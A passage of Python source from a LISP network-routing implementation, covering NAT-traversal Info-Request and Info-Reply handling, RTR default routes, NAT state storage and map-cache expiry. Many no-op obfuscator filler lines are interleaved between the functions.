            green(seid.print_address(), False)))
        return
    #endif

    mr.last_used = lisp_get_timestamp()
    mr.map_requests_sent += 1
    if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce

    #
    # Send the Map-Request inside an ECM to the map-resolver.
    #
    if (seid == None): seid = itr_rloc
    lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
        mr.map_resolver)

    #
    # Timestamp for Map-Request rate-limiting.
    #
    lisp_last_map_request_sent = lisp_get_timestamp()

    #
    # Refresh the resolver's DNS name binding, if configured by name.
    #
    mr.resolve_dns_name()
    return
if 96 - 96: IiII
if 37 - 37: Ii1I % i11iIiiIii + iIii1I11I1II1 % Oo0Ooo - iIii1I11I1II1
if 26 - 26: o0oOOo0O0Ooo . i1IIi
if 62 - 62: IiII * I1ii11iIi11i % iIii1I11I1II1 / II111iiii - OoO0O00
if 52 - 52: iII111i . I11i - I11i + oO0o + iIii1I11I1II1
if 83 - 83: I11i * iIii1I11I1II1 + OoOoOO00
if 81 - 81: ooOoO0o * OOooOOo / OoO0O00 + I1ii11iIi11i % I1Ii111
if 37 - 37: i11iIiiIii - OoooooooOO - OoOoOO00 * oO0o / Ii1I
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
    """
    Send an Info-Request to 'dest' on 'port' (control or data port).
    When 'device_name' is given, the request is steered out that
    interface by temporarily installing a host route via the
    interface's default-route next-hop; any pre-existing host route is
    restored before returning.
    """

    #
    # Build the Info-Request; qualify our hostname with the device name
    # so each interface registers distinct state.
    #
    info = lisp_info()
    info.nonce = lisp_get_control_nonce()
    if (device_name): info.hostname += "-" + device_name

    dest_str = dest.print_address_no_iid()

    #
    # Host-route juggling so the packet leaves via 'device_name'.
    #
    route_added = False
    if (device_name):
        saved_next_hop = lisp_get_host_route_next_hop(dest_str)

        #
        # For the control port, wait for a transient host route
        # (installed by a concurrent data-port request) to disappear
        # before proceeding.
        #
        if (port == LISP_CTRL_PORT and saved_next_hop != None):
            while (True):
                time.sleep(.01)
                saved_next_hop = lisp_get_host_route_next_hop(dest_str)
                if (saved_next_hop == None): break
            #endwhile
        #endif

        next_hops = lisp_get_default_route_next_hops()
        for device, gateway in next_hops:
            if (device != device_name): continue

            #
            # Swap any existing host route for one via this
            # interface's gateway.
            #
            if (saved_next_hop != gateway):
                if (saved_next_hop != None):
                    lisp_install_host_route(dest_str, saved_next_hop, False)
                #endif
                lisp_install_host_route(dest_str, gateway, True)
                route_added = True
            #endif
            break
        #endfor
    #endif

    packet = info.encode()
    info.print_info()

    #
    # Log where this Info-Request is going.
    #
    kind = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
    kind = bold(kind, False)
    port_str = bold("{}".format(port), False)
    dest_color = red(dest_str, False)
    node = "RTR " if port == LISP_DATA_PORT else "MS "
    lprint("Send Info-Request to {}{}, port {} {}".format(node, dest_color,
        port_str, kind))

    #
    # Control-port requests go as-is; data-port requests get a LISP
    # data header with instance-id 0xffffff prepended.
    #
    if (port == LISP_CTRL_PORT):
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    else:
        header = lisp_data_header()
        header.instance_id(0xffffff)
        header = header.encode()
        if (header):
            packet = header + packet
            lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
        #endif
    #endif

    #
    # Remove the temporary host route and restore the saved one.
    #
    if (route_added):
        lisp_install_host_route(dest_str, None, False)
        if (saved_next_hop != None): lisp_install_host_route(dest_str,
            saved_next_hop, True)
    #endif
    return
if 73 - 73: OoooooooOO
if 45 - 45: IiII + I1IiiI * I1Ii111
if 82 - 82: OOooOOo / I11i % Ii1I * OoOoOO00
if 88 - 88: o0oOOo0O0Ooo % OoO0O00
if 30 - 30: II111iiii / Oo0Ooo % Oo0Ooo + O0 / iIii1I11I1II1 . OoO0O00
if 43 - 43: I1IiiI % OoOoOO00 * O0 + o0oOOo0O0Ooo
if 97 - 97: iIii1I11I1II1 + O0
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
    """
    Parse a received Info-Request and answer with an Info-Reply that
    carries the outer source address/port the request arrived from and
    the supplied RTR list. The sender is then cached as an info-source.
    """

    #
    # Parse the Info-Request.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return
    info.print_info()

    #
    # Turn it into an Info-Reply reporting the address and port this
    # request was received from.
    #
    info.info_reply = True
    info.global_etr_rloc.store_address(addr_str)
    info.etr_port = sport

    #
    # Echo the sender's hostname as a distinguished-name private RLOC.
    #
    if (info.hostname != None):
        info.private_etr_rloc.afi = LISP_AFI_NAME
        info.private_etr_rloc.store_address(info.hostname)
    #endif

    if (rtr_list != None): info.rtr_list = rtr_list
    packet = info.encode()
    info.print_info()

    #
    # Reply to the Info-Request's source port.
    #
    lprint("Send Info-Reply to {}".format(red(addr_str, False)))
    dest = lisp_convert_4to6(addr_str)
    lisp_send(lisp_sockets, dest, sport, packet)

    #
    # Cache this sender as an info-source.
    #
    info_source = lisp_info_source(info.hostname, addr_str, sport)
    info_source.cache_address_for_info_source()
    return
if 38 - 38: II111iiii
if 44 - 44: OOooOOo + i11iIiiIii - I1Ii111 + ooOoO0o
if 92 - 92: O0 . iIii1I11I1II1 % iIii1I11I1II1 % OoO0O00 - i11iIiiIii - iII111i
if 76 - 76: OoO0O00 . II111iiii / I1ii11iIi11i
if 15 - 15: OoOoOO00 . O0 + iII111i + I1IiiI . ooOoO0o + iIii1I11I1II1
if 2 - 2: I11i
if 52 - 52: i11iIiiIii / oO0o / IiII
if 84 - 84: I11i . oO0o + ooOoO0o
def lisp_get_signature_eid():
    """
    Return the first database-mapping entry configured with a
    signature-eid, or None when none is configured.
    """
    for db in lisp_db_list:
        if (db.signature_eid): return(db)
    return(None)
if 97 - 97: ooOoO0o % Oo0Ooo . o0oOOo0O0Ooo
if 22 - 22: O0 % I11i + OoO0O00 - iII111i + I1IiiI . O0
if 73 - 73: ooOoO0o + O0 - I11i . I1IiiI + OOooOOo
if 36 - 36: I11i % OoO0O00 * OoOoOO00 - I1Ii111
if 16 - 16: ooOoO0o % OOooOOo . OoO0O00 % II111iiii . iIii1I11I1II1
if 21 - 21: oO0o + II111iiii / OoOoOO00 * I11i
if 90 - 90: OoOoOO00 % OoOoOO00 + I11i
if 70 - 70: I1IiiI . ooOoO0o / I11i / OoO0O00
def lisp_get_any_translated_port():
    """
    Return the translated port of the first RLOC-set entry in any
    database-mapping that has a non-null translated RLOC, else None.
    """
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.translated_rloc.is_null()): continue
            return(rloc_entry.translated_port)
        #endfor
    #endfor
    return(None)
if 80 - 80: I1ii11iIi11i
if 6 - 6: I1ii11iIi11i + OOooOOo % ooOoO0o
if 65 - 65: iIii1I11I1II1 % i1IIi / I1IiiI / oO0o % ooOoO0o / I11i
if 2 - 2: I1ii11iIi11i
if 90 - 90: II111iiii * I1Ii111 . ooOoO0o - I1ii11iIi11i % I11i * o0oOOo0O0Ooo
if 85 - 85: iIii1I11I1II1
if 76 - 76: i11iIiiIii % I1IiiI / I11i
if 42 - 42: o0oOOo0O0Ooo . I1IiiI + I11i . OoOoOO00 - O0 / Ii1I
if 66 - 66: IiII + OoOoOO00 + I1IiiI + i1IIi + OoooooooOO % I1IiiI
def lisp_get_any_translated_rloc():
    """
    Return the first non-null translated RLOC found across all
    database-mapping RLOC-sets, else None.
    """
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.translated_rloc.is_null()): continue
            return(rloc_entry.translated_rloc)
        #endfor
    #endfor
    return(None)
if 72 - 72: oO0o . OoooooooOO % ooOoO0o % OoO0O00 * oO0o * OoO0O00
if 14 - 14: I11i / I11i
if 90 - 90: O0 * OOooOOo / oO0o . Oo0Ooo * I11i
if 93 - 93: oO0o / ooOoO0o - I1Ii111
if 70 - 70: OOooOOo / Ii1I - ooOoO0o + OoooooooOO / OoO0O00 - i11iIiiIii
if 26 - 26: O0 + Oo0Ooo
if 30 - 30: IiII
def lisp_get_all_translated_rlocs():
    """
    Return a list of address strings (no instance-id) for every
    translated RLOC across all database-mapping RLOC-sets.
    """
    addr_list = []
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.is_rloc_translated() == False): continue
            addr_list.append(rloc_entry.translated_rloc.print_address_no_iid())
        #endfor
    #endfor
    return(addr_list)
if 42 - 42: iII111i % i11iIiiIii % o0oOOo0O0Ooo . O0 % iII111i
if 72 - 72: Oo0Ooo . Oo0Ooo . IiII . Oo0Ooo
if 80 - 80: I1Ii111 + IiII + O0 - I1Ii111 . iIii1I11I1II1
if 53 - 53: OoO0O00 / i11iIiiIii * I1Ii111
if 62 - 62: oO0o / Oo0Ooo / IiII + I11i * ooOoO0o
if 84 - 84: ooOoO0o + OoOoOO00 * I1ii11iIi11i % OoooooooOO . O0
if 27 - 27: OoO0O00 * OoooooooOO - II111iiii / o0oOOo0O0Ooo
if 76 - 76: I11i % I1Ii111 % iII111i + IiII * iII111i + OoOoOO00
def lisp_update_default_routes(map_resolver, iid, rtr_list):
    """Install default map-cache entries (unicast and, when applicable,
    multicast) for instance-ID 'iid' whose RLOC-set is the supplied RTR
    list. 'rtr_list' is a dict keyed by address string; values appear to
    be address objects (NOTE(review): confirm against callers).
    """
    behind_nat = (os.getenv("LISP_RTR_BEHIND_NAT") != None)

    # When this system is behind a NAT, ignore RTR entries that carry a
    # private address — they are not reachable from here.
    usable_rtrs = {}
    for rtr_key in rtr_list:
        if (rtr_key == None): continue
        rtr_addr = rtr_list[rtr_key]
        if (behind_nat and rtr_addr.is_private_address()): continue
        usable_rtrs[rtr_key] = rtr_addr
    rtr_list = usable_rtrs

    eid_tuples = []
    for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
        # MAC default route only when the L2-overlay feature is on.
        if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break

        #
        # Unicast default route. If an entry already exists, refresh a
        # checkpoint entry, keep an entry whose RLOC-set already matches,
        # and otherwise delete it so it can be re-added below.
        #
        eid = lisp_address(afi, "", 0, iid)
        eid.make_default_route(eid)
        mc = lisp_map_cache.lookup_cache(eid, True)
        if (mc):
            if (mc.checkpoint_entry):
                lprint("Updating checkpoint entry for {}".format(green(mc.print_eid_tuple(), False)))
            elif (mc.do_rloc_sets_match(rtr_list.values())):
                continue
            mc.delete_cache()

        eid_tuples.append([eid, ""])

        #
        # Multicast default route (*, G) for the same instance-ID.
        #
        group = lisp_address(afi, "", 0, iid)
        group.make_default_multicast_route(group)
        gmc = lisp_map_cache.lookup_cache(group, True)
        if (gmc): gmc = gmc.source_cache.lookup_cache(eid, True)
        if (gmc): gmc.delete_cache()

        eid_tuples.append([eid, group])

    if (len(eid_tuples) == 0): return

    #
    # Build the RTR RLOC-set with low unicast/multicast priorities.
    #
    rtr_rloc_set = []
    for rtr_key in rtr_list:
        rtr_addr = rtr_list[rtr_key]
        rloc_entry = lisp_rloc()
        rloc_entry.rloc.copy_address(rtr_addr)
        rloc_entry.priority = 254
        rloc_entry.mpriority = 255
        rloc_entry.rloc_name = "RTR"
        rtr_rloc_set.append(rloc_entry)

    #
    # Add one map-cache entry per EID tuple. Deep-copy the RLOC-set each
    # iteration so every map-cache entry owns its own copy.
    #
    for eid_tuple in eid_tuples:
        mc = lisp_mapping(eid_tuple[0], eid_tuple[1], rtr_rloc_set)
        mc.mapping_source = map_resolver
        mc.map_cache_ttl = LISP_MR_TTL * 60
        mc.add_cache()
        lprint("Add {} to map-cache with RTR RLOC-set: {}".format(green(mc.print_eid_tuple(), False), rtr_list.keys()))

        rtr_rloc_set = copy.deepcopy(rtr_rloc_set)
    return
if 20 - 20: Ii1I
if 100 - 100: OoooooooOO . I1Ii111
if 32 - 32: iIii1I11I1II1 . iIii1I11I1II1 % II111iiii / Oo0Ooo . iIii1I11I1II1 . O0
if 63 - 63: I1IiiI . iIii1I11I1II1 . Oo0Ooo % OOooOOo - iII111i + ooOoO0o
if 64 - 64: o0oOOo0O0Ooo / Ii1I % I1Ii111 % iII111i + OOooOOo * IiII
if 87 - 87: I1ii11iIi11i . i1IIi - I11i + OoOoOO00 . O0
if 37 - 37: IiII
if 65 - 65: ooOoO0o * Ii1I / I1IiiI . i1IIi % ooOoO0o . OoooooooOO
if 17 - 17: ooOoO0o / OoO0O00 / I1IiiI / OOooOOo % IiII
if 88 - 88: i1IIi - OoOoOO00
def lisp_process_info_reply(source, packet, store):
    """Process a received LISP Info-Reply message.

    Decodes 'packet', records any new RTRs it advertises, triggers
    default-route updates when acting as an ITR, and (when 'store' is
    True) stores the discovered NAT translation on matching
    database-mapping RLOCs.

    Returns [global-rloc, translated-port, new-rtr-list-flag], or
    [None, None, False] when the packet cannot be decoded.

    Fix: replaced Python-2-only dict.has_key() with the 'in' operator
    (works on both Python 2 and 3).
    """
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return ([None, None, False])

    info.print_info()

    #
    # Record any RTRs advertised in the Info-Reply that we don't already
    # know about (or that we know but have no address object for yet).
    #
    new_rtr_list = False
    for rtr in info.rtr_list:
        rtr_str = rtr.print_address_no_iid()
        if (rtr_str in lisp_rtr_list):
            if (lisp_register_all_rtrs == False): continue
            if (lisp_rtr_list[rtr_str] != None): continue

        new_rtr_list = True
        lisp_rtr_list[rtr_str] = rtr

    #
    # As an ITR with new RTRs, refresh default map-cache routes for every
    # configured instance-ID (or the default IID when none are mapped).
    #
    if (lisp_i_am_itr and new_rtr_list):
        if (lisp_iid_to_interface == {}):
            lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
        else:
            for iid in lisp_iid_to_interface.keys():
                lisp_update_default_routes(source, int(iid), lisp_rtr_list)

    #
    # Caller only wants the translation info back, not stored.
    #
    if (store == False):
        return ([info.global_etr_rloc, info.etr_port, new_rtr_list])

    #
    # Store the discovered global RLOC/port translation on each matching
    # database-mapping RLOC entry.
    #
    for db_entry in lisp_db_list:
        for rloc_entry in db_entry.rloc_set:
            rloc = rloc_entry.rloc
            interface = rloc_entry.interface
            if (interface == None):
                # Address-configured RLOC: must be a local, non-null
                # address matching the private RLOC in the Info-Reply.
                if (rloc.is_null()): continue
                if (rloc.is_local() == False): continue
                if (info.private_etr_rloc.is_null() == False and
                    rloc.is_exact_match(info.private_etr_rloc) == False):
                    continue

            elif (info.private_etr_rloc.is_dist_name()):
                # Interface-configured RLOC matched by distinguished name.
                rloc_name = info.private_etr_rloc.address
                if (rloc_name != rloc_entry.rloc_name): continue

            eid_str = green(db_entry.eid.print_prefix(), False)
            rloc_str = red(rloc.print_address_no_iid(), False)

            # Global RLOC equals our local RLOC and no port stored: no NAT.
            same = info.global_etr_rloc.is_exact_match(rloc)
            if (rloc_entry.translated_port == 0 and same):
                lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
                    interface, eid_str))
                continue

            # Skip when the stored translation is already current.
            global_rloc = info.global_etr_rloc
            translated = rloc_entry.translated_rloc
            if (translated.is_exact_match(global_rloc) and
                info.etr_port == rloc_entry.translated_port): continue

            lprint("Store translation {}:{} for {} ({}), EID-prefix {}".format(red(info.global_etr_rloc.print_address_no_iid(), False),
                info.etr_port, rloc_str, interface, eid_str))

            rloc_entry.store_translated_rloc(info.global_etr_rloc,
                info.etr_port)

    return ([info.global_etr_rloc, info.etr_port, new_rtr_list])
if 30 - 30: i11iIiiIii * Oo0Ooo . IiII
if 65 - 65: oO0o * IiII * OOooOOo / OoooooooOO % I11i / I1Ii111
if 21 - 21: i1IIi * iII111i + OoO0O00
if 27 - 27: I11i / oO0o . iII111i + o0oOOo0O0Ooo - OOooOOo
if 85 - 85: OoooooooOO
if 83 - 83: iII111i * I11i . OOooOOo - OoO0O00 % IiII
if 8 - 8: I1Ii111
if 86 - 86: ooOoO0o + iII111i * O0 % OoO0O00 + OoOoOO00
def lisp_test_mr(lisp_sockets, port):
    """Send test Map-Requests to exercise the configured Map-Resolvers,
    then rearm a periodic timer to repeat the test.

    NOTE(review): the immediate 'return' below disables this function;
    all code after it is intentionally unreachable and kept as-is.
    """
    return
    lprint("Test Map-Resolvers")

    eid_v4 = lisp_address(LISP_AFI_IPV4, "", 0, 0)
    eid_v6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)

    #
    # IPv4 test destinations.
    #
    eid_v4.store_address("10.0.0.1")
    lisp_send_map_request(lisp_sockets, port, None, eid_v4, None)
    eid_v4.store_address("192.168.0.1")
    lisp_send_map_request(lisp_sockets, port, None, eid_v4, None)

    #
    # IPv6 test destinations.
    #
    eid_v6.store_address("0100::1")
    lisp_send_map_request(lisp_sockets, port, None, eid_v6, None)
    eid_v6.store_address("8000::1")
    lisp_send_map_request(lisp_sockets, port, None, eid_v6, None)

    #
    # Rearm the periodic test timer.
    #
    test_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
        [lisp_sockets, port])
    test_timer.start()
    return
if 20 - 20: OoO0O00 / I1ii11iIi11i / iII111i / o0oOOo0O0Ooo
if 37 - 37: o0oOOo0O0Ooo - ooOoO0o + OoOoOO00
if 50 - 50: I1IiiI
if 30 - 30: i1IIi + II111iiii . Oo0Ooo + iIii1I11I1II1
if 54 - 54: o0oOOo0O0Ooo / i11iIiiIii - I11i - oO0o
if 16 - 16: I1ii11iIi11i / OoO0O00
if 2 - 2: i11iIiiIii . iII111i
if 35 - 35: Ii1I
if 54 - 54: OOooOOo
if 83 - 83: i1IIi / II111iiii - I1IiiI + I1ii11iIi11i . IiII * oO0o
if 92 - 92: OoOoOO00 + oO0o % Ii1I / Ii1I - iII111i
if 11 - 11: Oo0Ooo % II111iiii * Ii1I + II111iiii
if 9 - 9: I1Ii111
def lisp_update_local_rloc(rloc):
    """Refresh an interface-configured RLOC with the interface's current
    address. Also updates the cached value in lisp_myrlocs[0]. No-op when
    the RLOC has no interface, the interface has no address, or the
    address is unchanged."""
    if (rloc.interface == None): return

    current = lisp_get_interface_address(rloc.interface)
    if (current == None): return

    old_str = rloc.rloc.print_address_no_iid()
    new_str = current.print_address_no_iid()

    if (old_str == new_str): return

    lprint("Local interface address changed on {} from {} to {}".format(rloc.interface, old_str, new_str))

    rloc.rloc.copy_address(current)
    lisp_myrlocs[0] = current
    return
if 62 - 62: OoOoOO00
if 6 - 6: OoO0O00 * ooOoO0o . oO0o
if 77 - 77: iIii1I11I1II1
if 96 - 96: iII111i * I1ii11iIi11i
if 77 - 77: i11iIiiIii / iIii1I11I1II1 . I1ii11iIi11i
if 90 - 90: I1IiiI + I1IiiI % oO0o
if 95 - 95: OOooOOo + OoooooooOO . i11iIiiIii * OoO0O00 * I1IiiI / I1Ii111
if 5 - 5: Ii1I . oO0o / o0oOOo0O0Ooo - OoooooooOO
def lisp_update_encap_port(mc):
    """Walk the RLOC-set of map-cache entry 'mc' and refresh each RLOC's
    translated encapsulation port from the latest stored NAT state."""
    for rloc_entry in mc.rloc_set:
        nat_info = lisp_get_nat_info(rloc_entry.rloc, rloc_entry.rloc_name)
        if (nat_info == None): continue
        if (rloc_entry.translated_port == nat_info.port): continue

        lprint("Encap-port changed from {} to {} for RLOC {}, EID-prefix {}".format(rloc_entry.translated_port, nat_info.port,
            red(rloc_entry.rloc.print_address_no_iid(), False),
            green(mc.print_eid_tuple(), False)))

        rloc_entry.store_translated_rloc(rloc_entry.rloc, nat_info.port)
    return
if 53 - 53: i1IIi / iII111i % Ii1I % OoooooooOO
if 63 - 63: OOooOOo + I1ii11iIi11i . i1IIi . Ii1I - I1ii11iIi11i * o0oOOo0O0Ooo
if 79 - 79: ooOoO0o - O0
if 20 - 20: OOooOOo
if 22 - 22: iIii1I11I1II1 / I1Ii111
if 6 - 6: iII111i . i11iIiiIii / Oo0Ooo
if 86 - 86: I11i % I1Ii111 % oO0o - ooOoO0o / i1IIi
if 68 - 68: i1IIi % O0 % iII111i
if 55 - 55: I1ii11iIi11i % OOooOOo - o0oOOo0O0Ooo - II111iiii
if 52 - 52: I1Ii111
if 34 - 34: II111iiii + iII111i / IiII
if 47 - 47: OoO0O00
def lisp_timeout_map_cache_entry(mc, delete_list):
    """Examine one map-cache entry for TTL expiry.

    Entries with no TTL never expire; fresh entries just get their encap
    port refreshed; expired entries are appended to 'delete_list'.
    Returns [True, delete_list] so it can be used as a walk callback.
    """
    if (mc.map_cache_ttl == None):
        lisp_update_encap_port(mc)
        return ([True, delete_list])

    now = lisp_get_timestamp()

    #
    # Entry still within TTL — keep it, refreshing the encap port when no
    # negative action is attached.
    #
    if (mc.last_refresh_time + mc.map_cache_ttl > now):
        if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
        return ([True, delete_list])

    #
    # Entry timed out — log it and queue it for deletion.
    #
    elapsed = lisp_print_elapsed(mc.last_refresh_time)
    eid_str = mc.print_eid_tuple()
    lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}".format(green(eid_str, False), bold("timed out", False), elapsed))

    delete_list.append(mc)
    return ([True, delete_list])
if 32 - 32: iIii1I11I1II1
if 71 - 71: Ii1I * I1IiiI
if 62 - 62: II111iiii / I1IiiI . I1ii11iIi11i
if 49 - 49: IiII / OoOoOO00 / O0 * i11iIiiIii
if 47 - 47: i11iIiiIii + iII111i + i11iIiiIii
if 66 - 66: o0oOOo0O0Ooo . I1IiiI + OoooooooOO . iII111i / OoooooooOO - IiII
if 47 - 47: o0oOOo0O0Ooo / II111iiii * i11iIiiIii * OoO0O00 . iIii1I11I1II1
if 34 - 34: I11i / o0oOOo0O0Ooo * OOooOOo * OOooOOo
def lisp_timeout_map_cache_walk(mc, parms):
    """Walk callback that times out one map-cache node.

    'parms' is [delete_list, checkpoint_list]. Unicast entries are aged
    directly; surviving ones are written to the checkpoint list. (S,G)
    nodes recurse into their source-cache with the same callback.

    NOTE(review): lisp_write_checkpoint_entry's return value is bound to
    a local only — the original 'parms' list object is what is returned,
    so the helper presumably mutates/returns the same list; confirm.
    """
    delete_list = parms[0]
    checkpoint_list = parms[1]

    #
    # Unicast entry (no group): age it, then checkpoint it unless it was
    # just queued for deletion (i.e. it is the last delete_list element).
    #
    if (mc.group.is_null()):
        keep_walking, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
        if (delete_list == [] or mc != delete_list[-1]):
            checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
        return ([keep_walking, parms])

    if (mc.source_cache == None): return ([True, parms])

    #
    # (*, G) node — age each (S, G) entry in its source cache.
    #
    parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
    return ([True, parms])
if 21 - 21: I1ii11iIi11i - ooOoO0o
if 81 - 81: iII111i / i11iIiiIii / I1Ii111
if 70 - 70: I1ii11iIi11i / i11iIiiIii
if 90 - 90: II111iiii / OoOoOO00 . Ii1I . OoooooooOO
if 76 - 76: OoooooooOO
if 78 - 78: IiII % i11iIiiIii
if 23 - 23: iIii1I11I1II1 - o0oOOo0O0Ooo - Ii1I % OOooOOo
def lisp_timeout_map_cache(lisp_map_cache):
    """Age the entire map-cache: delete timed-out entries and write a
    checkpoint file of the entries that survive."""
    walk_parms = [[], []]
    walk_parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, walk_parms)

    #
    # Delete entries the walk queued for removal.
    #
    for mc in walk_parms[0]: mc.delete_cache()

    #
    # Persist the surviving entries.
    #
    lisp_checkpoint(walk_parms[1])
    return
if 50 - 50: i11iIiiIii
if 93 - 93: i1IIi / Ii1I * II111iiii - Oo0Ooo . OoOoOO00 - OOooOOo
if 25 - 25: I11i / ooOoO0o % ooOoO0o - OOooOOo
if 59 - 59: I1IiiI + o0oOOo0O0Ooo . iIii1I11I1II1 - O0 - i11iIiiIii
if 4 - 4: I1IiiI
if 36 - 36: Ii1I
if 76 - 76: i11iIiiIii + i1IIi
if 56 - 56: OoOoOO00 + II111iiii / i11iIiiIii * OoOoOO00 * OoooooooOO
if 15 - 15: OoOoOO00 / OoooooooOO + OOooOOo
if 76 - 76: Ii1I * iII111i . OoooooooOO
if 92 - 92: iIii1I11I1II1 - Oo0Ooo - I1IiiI - OOooOOo * I1Ii111
if 44 - 44: I1Ii111 - II111iiii / OOooOOo
if 50 - 50: I11i / I1ii11iIi11i
if 60 - 60: II111iiii / Ii1I + OoO0O00 % I1IiiI * i1IIi / II111iiii
if 91 - 91: I1IiiI * I1Ii111 * i11iIiiIii - oO0o - IiII + I1ii11iIi11i
if 99 - 99: OoO0O00 % o0oOOo0O0Ooo
def lisp_store_nat_info(hostname, rloc, port):
    """Store NAT translation state for 'hostname' keyed in the global
    lisp_nat_state_info dict, most-recent entry first.

    Returns True when the caller should react to new/changed state (new
    hostname, new translation, or a translation moved back to the front),
    and False when the head entry merely had its uptime refreshed.

    Fix: replaced Python-2-only dict.has_key() with the 'in' operator
    (works on both Python 2 and 3).
    """
    addr_str = rloc.print_address_no_iid()
    # Leading "{}" is re-substituted below with the action verb.
    msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
        blue(hostname, False), red(addr_str, False), port)

    new_entry = lisp_nat_info(addr_str, hostname, port)

    #
    # First state ever seen for this hostname.
    #
    if (hostname not in lisp_nat_state_info):
        lisp_nat_state_info[hostname] = [new_entry]
        lprint(msg.format("Store initial"))
        return (True)

    #
    # Head entry already matches — just refresh its uptime.
    #
    head = lisp_nat_state_info[hostname][0]
    if (head.address == addr_str and head.port == port):
        head.uptime = lisp_get_timestamp()
        lprint(msg.format("Refresh existing"))
        return (False)

    #
    # Translation differs from the head entry. If it matches an older
    # entry, remove that entry; either way a fresh entry is prepended.
    #
    previous = None
    for nat_info in lisp_nat_state_info[hostname]:
        if (nat_info.address == addr_str and nat_info.port == port):
            previous = nat_info
            break

    if (previous == None):
        lprint(msg.format("Store new"))
    else:
        lisp_nat_state_info[hostname].remove(previous)
        lprint(msg.format("Use previous"))

    remaining = lisp_nat_state_info[hostname]
    lisp_nat_state_info[hostname] = [new_entry] + remaining
    return (True)
if 36 - 36: ooOoO0o . Ii1I * ooOoO0o - OoOoOO00
if 20 - 20: ooOoO0o
if 13 - 13: i11iIiiIii + i11iIiiIii
if 21 - 21: OoooooooOO
if 76 - 76: Ii1I . i11iIiiIii * I1IiiI % o0oOOo0O0Ooo * OoO0O00
if 79 - 79: O0 % iIii1I11I1II1 * iII111i - II111iiii % Oo0Ooo + i11iIiiIii
if 36 - 36: OOooOOo / o0oOOo0O0Ooo . OoOoOO00 - I11i
if 89 - 89: i1IIi - iIii1I11I1II1 / II111iiii
def lisp_get_nat_info(rloc, hostname):
    """Return the stored NAT state entry for (hostname, rloc-address), or
    None when no matching state exists in lisp_nat_state_info.

    Fix: replaced Python-2-only dict.has_key() with the 'in' operator
    (works on both Python 2 and 3).
    """
    if (hostname not in lisp_nat_state_info): return (None)

    addr_str = rloc.print_address_no_iid()
    for nat_info in lisp_nat_state_info[hostname]:
        if (nat_info.address == addr_str): return (nat_info)

    return (None)
if 52 - 52: Oo0Ooo - I11i - IiII - OoOoOO00
if 21 - 21: oO0o % o0oOOo0O0Ooo + I1Ii111 . OOooOOo / OOooOOo
if 41 - 41: Oo0Ooo . ooOoO0o * oO0o
if 31 - 31: Oo0Ooo * IiII / IiII
if 3 - 3: I1Ii111
if 65 - 65: iIii1I11I1II1 % Oo0Ooo % I11i / OoooooooOO
if 82 - 82: o0oOOo0O0Ooo
if 33 - 33: OoOoOO00 / i11iIiiIii - I1IiiI - OoooooooOO + i1IIi * I1Ii111
if 92 - 92: iII111i + OoO0O00
if 70 - 70: iIii1I11I1II1
if 100 - 100: OOooOOo . oO0o % ooOoO0o * ooOoO0o . I1Ii111 - oO0o
if 33 - 33: Oo0Ooo . i1IIi - OoooooooOO
if 14 - 14: I1Ii111 + Oo0Ooo
if 35 - 35: i11iIiiIii * Ii1I
if 100 - 100: O0 . iII111i / iIii1I11I1II1
if 47 - 47: ooOoO0o + OoOoOO00
if 67 - 67: IiII - I1ii11iIi11i * i1IIi - ooOoO0o
if 91 - 91: I11i
if 54 - 54: I1ii11iIi11i / i1IIi
if 14 - 14: iIii1I11I1II1 * I11i . I11i * ooOoO0o * iII111i
def lisp_build_info_requests(lisp_sockets, dest, port):
    """Send LISP Info-Request messages (NAT-traversal discovery) from
    each interface-configured local RLOC.

    When 'dest' is None, targets all configured Map-Resolvers, falling
    back to all Map-Servers; otherwise only 'dest'. No-op unless
    NAT-traversal is enabled.
    """
    if (lisp_nat_traversal == False): return

    #
    # Build the destination list.
    #
    dest_list = []
    mr_dest_list = []
    if (dest == None):
        for mr in lisp_map_resolvers_list.values():
            mr_dest_list.append(mr.map_resolver)

        dest_list = mr_dest_list
        if (dest_list == []):
            for ms in lisp_map_servers_list.values():
                dest_list.append(ms.map_server)

        if (dest_list == []): return
    else:
        dest_list.append(dest)

    #
    # Collect the local interface RLOCs to source Info-Requests from,
    # de-duplicated by address string.
    #
    rloc_by_addr = {}
    for db_entry in lisp_db_list:
        for rloc_entry in db_entry.rloc_set:
            lisp_update_local_rloc(rloc_entry)
            if (rloc_entry.rloc.is_null()): continue
            if (rloc_entry.interface == None): continue

            addr_str = rloc_entry.rloc.print_address_no_iid()
            if (addr_str in rloc_by_addr): continue
            rloc_by_addr[addr_str] = rloc_entry.interface

    if (rloc_by_addr == {}):
        lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + "found in any database-mappings")

        return

    #
    # Send one Info-Request per (local RLOC, destination) pair. The
    # source device is only pinned when multiple local RLOCs exist.
    #
    for addr_str in rloc_by_addr:
        interface = rloc_by_addr[addr_str]
        addr_log = red(addr_str, False)
        lprint("Build Info-Request for private address {} ({})".format(addr_log,
            interface))
        device = interface if len(rloc_by_addr) > 1 else None
        for dest in dest_list:
            lisp_send_info_request(lisp_sockets, dest, port, device)

    #
